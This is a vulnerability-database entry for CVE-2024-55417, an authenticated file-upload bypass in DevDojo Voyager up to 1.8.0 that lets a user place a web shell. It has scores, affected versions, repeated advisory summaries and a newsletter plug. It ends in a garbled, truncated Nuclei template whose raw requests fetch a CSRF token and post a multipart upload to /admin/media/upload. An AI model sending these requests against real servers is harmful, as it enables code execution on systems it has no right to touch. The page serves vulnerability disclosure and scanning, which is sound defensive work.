CVE-2024-55417
published 2025-01-30CVE-2024-55417: DevDojo Voyager through version 1.8.0 is vulnerable to bypassing the file type verification when an authenticated user uploads a file via /admin/media/upload…
PriorityP339medium4.3CVSS 3.1
AVNACLPRLUINSUCNILAN
EXPLOIT
EPSS
12.30%
95.7th percentile
DevDojo Voyager through version 1.8.0 is vulnerable to bypassing the file type verification when an authenticated user uploads a file via /admin/media/upload. An authenticated user can upload a web shell causing arbitrary code execution on the server.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tcg | voyager | 0 – 1.8.0 | — |
| thecontrolgroup | voyager | <= 1.8.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
DevDojo Voyager Arbitrary File Write
ghsa·2025-01-30
CVE-2024-55417 [MEDIUM] CWE-434 DevDojo Voyager Arbitrary File Write
DevDojo Voyager Arbitrary File Write
DevDojo Voyager through version 1.8.0 is vulnerable to bypassing the file type verification when an authenticated user uploads a file via /admin/media/upload. An authenticated user can upload a web shell causing arbitrary code execution on the server.
OSV
DevDojo Voyager Arbitrary File Write
osv·2025-01-30
CVE-2024-55417 [MEDIUM] DevDojo Voyager Arbitrary File Write
DevDojo Voyager Arbitrary File Write
DevDojo Voyager through version 1.8.0 is vulnerable to bypassing the file type verification when an authenticated user uploads a file via /admin/media/upload. An authenticated user can upload a web shell causing arbitrary code execution on the server.
No detection rules found.
Nuclei
DevDojo Voyager <= 1.8.0 - Arbitrary File Write vulnerability
nuclei·CVSS 4.3
CVE-2024-55417 [MEDIUM] DevDojo Voyager <= 1.8.0 - Arbitrary File Write vulnerability
DevDojo Voyager ')"
- "status_code == 302"
condition: and
internal: true
- raw:
- |
GET /admin/media HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: csrf2
group: 1
regex:
- '"csrf-token" content="([a-zA-Z0-9]+)"'
- raw:
- |
POST /admin/media/upload HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqv6qtCsokj1vi0NA
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="_token"
{{csrf2}}
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="upload_path"
/
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="filename"
null
------WebKitFormBoundaryqv6qtCsokj1vi0NA
Content-Disposition: form-data; name="detail
2025-01-30
Published